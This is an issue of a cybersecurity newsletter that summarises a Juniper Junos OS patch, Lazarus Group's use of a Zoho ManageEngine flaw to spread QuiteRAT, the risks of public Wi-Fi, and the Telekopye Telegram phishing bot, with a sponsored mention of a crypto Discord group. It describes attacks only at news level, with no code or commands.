Exploits on Zoho service desk

Aug 25 2023

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter that’s praying the cybercriminals take this August bank holiday weekend off… to our non-UK readers, tonight is the beginning of a long weekend for us Brits 😎🎉🎉

It’s Friday, folks, which can only mean one thing… It’s time for our weekly segment!!!

It goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it.

Congrats, the cybercriminals are no match… for your patch! Check out these freshly hatched patches!! 🩹🩹🩹

New Juniper Junos OS flaws expose devices to remote attacks! Aw, RATs! Geddit? 😏

🔒 Juniper Networks has urgently released a security update to fix multiple vulnerabilities in the J-Web component of Junos OS.

These flaws, when combined, could allow remote code execution. The vulnerabilities affect all versions of Junos OS on SRX and EX Series, with a total CVSS rating of 9.8.

🔧 Fix and Workaround: The vulnerabilities have been patched in various Junos OS versions for both EX Series and SRX Series devices. Users should apply the updates promptly. Alternatively, users can disable J-Web or restrict access to trusted hosts to mitigate risks.

Stay secure by keeping your systems up-to-date! 🛡️💻🔐Patch NOW, or forever hold your peace 😂😂😂

But wait, there’s more…

Now, on to today’s hottest cybersecurity stories:

  • 💀 Lazarus returns to exploits Zoho ManageEngine flaw with ‘QuiteRAT’ malware 👾

  • 👤‘Man-in-the-Middle’: Beware of the untold perils of public wifi 🌐

  • ✉️ New Telegram bot "Telekopye" fuels industrial-scale phishing scams from Russia 🌎

Users: Zoh-no! 😲

Hackers: Mmm, ‘Quite’ 😈

🔒 Lazarus Group Exploits Zoho ManageEngine Flaw 🔒

The notorious North Korea-linked hacker group, Lazarus Group, has been observed leveraging a recently patched critical security vulnerability in Zoho ManageEngine ServiceDesk Plus.

This exploit has been used to disseminate a remote access trojan named QuiteRAT. Cisco Talos, a cybersecurity firm, revealed that the group's targets encompass vital internet backbone infrastructure and healthcare organisations in Europe and the U.S.

Interestingly, the analysis has unveiled a new threat called CollectionRAT, originating from Lazarus Group's recycled attack infrastructure.

🌐 Despite years of documentation, Lazarus Group continues to utilise the same tactics, underscoring their confidence. QuiteRAT, a successor to MagicRAT, shares similar capabilities but has a smaller file size. It employs the Qt framework, adding complexity to its code.

The activity, spotted in early 2023, exploited CVE-2022-47966 only five days after its proof-of-concept emerged, deploying QuiteRAT from a malicious URL.

🔄 QuiteRAT displays evolution from MagicRAT, being smaller and lacking built-in persistence. Command issuance from the server is necessary for uninterrupted operation. The Lazarus Group increasingly uses open-source tools for initial access, including the GoLang-based DeimosC2 framework.

CollectionRAT collects metadata, runs commands, and delivers payloads, with its spread method not fully revealed.

🔑 Lazarus Group's shift towards new tactics and weaponizing disclosed software vulnerabilities highlights its expanding and evolving malicious strategies.

Stay vigilant against emerging threats! 🛡️🔍🚫

I came across ZZZ money club during the crypto market bull run when everyone’s a winner, even during the bear market this discord group has been amazing at giving information on projects and ways to make passive income in various ways.

The group is very active and everyone in this private discord group is very chatty and helpful.

Its run by Yourfriendandy and Decadeinvestor, you can find them here on YouTube, both top guys with great content.

If you are interested in joining the group you can through the link below.

I'm starting with the Man-in-the-Middle 🎶

I'm asking him to change his ways 😂

📶 Public Wi-Fi: Convenience vs. Risks 🛡️

Public Wi-Fi, now a common convenience, brings risks for both individuals and businesses. As remote work grows, working from cafes, hotels, or airports is popular. But let's explore the dangers.

🔒 Risks for Individuals:

  • Most connect to open networks without passwords, but attackers can steal sensitive info.

  • Man-in-the-Middle attacks: Hackers intercept data between users and websites.

  • Eavesdropping: Hackers listen to unencrypted data.

  • Rogue Hotspots: Fake networks capture sensitive data.

  • Spoofing: Hackers impersonate devices to manipulate data.

  • Session Hijacking: Attackers steal login sessions.

💼 Business Concerns:

  • Businesses face similar threats on public Wi-Fi.

  • Attackers target sensitive business data.

  • Honeypot Networks: Fake networks lure and infect users.

  • Malware Distribution: Hackers use Wi-Fi to spread malware.

  • Login Page Phishing: Fake login pages steal credentials.

🛡️Top Tips:

For Wi-Fi Owners: Use web filtering and DNS services to protect users.

For Users: Employ DNS filtering services, avoid sensitive sites, turn off sharing, and use HTTPS.

In short, while public Wi-Fi is handy, its vulnerabilities demand caution. Stay safe with protective steps! 🌐🔒💼

🗞️ Extra, Extra! Read all about it! 🗞️

Each fortnite, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 💰The Crypto Nutshell: Crypto News & Expert Predictions all in a nutshell 💪

  • 📈The Breakthrough: Receive one idea, one question, and one exercise each week that could spark your next breakthrough.

  • ✈️ViaTravelers: Get exclusive travel tips, news, and insider deals right in your inbox.

Let us know what you think!

That’s not Telegramatically correct 🙃

🤖 New Telegram Bot Scam Alert! 🚫

Beware of a fresh financial scam operation using a malicious Telegram bot named Telekopye.

The toolkit helps scammers create phishing web pages and send deceptive URLs to potential victims, dubbed Mammoths. This bot streamlines phishing with easy-to-use menus for scammers.

📡 The Setup: The threat actors, called Neanderthals, are suspected to originate from Russia, employing the Telekopye bot to craft and send fake links to Mammoths via email, SMS, or DMs.

Victims are tricked into entering payment details on sham credit/debit card gateways, leading to fund theft, which is then laundered through cryptocurrencies.

🕵️ Features & Tactics:

Telekopye is sophisticated, enabling phishing emails, web page creation, SMS messages, QR codes, and realistic images. The phishing domains mimic legit brand URLs to confuse victims. Notably, the operation centralises payouts, allowing the Telekopye admin to oversee Neanderthal activities.

💼 Hierarchical Scammers:

The scam network is organised into roles – Blocked, Workers, Good Workers, Moderators, and Administrators. Good Workers and Admins have higher privileges, while scammers try to manipulate victims with manipulated language.

Top Tips:

To avoid falling victim, insist on in-person transactions, be cautious with online marketplaces, and never send money without assurance. As scams evolve, vigilance remains essential. 🚨🛡️

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

Recent articles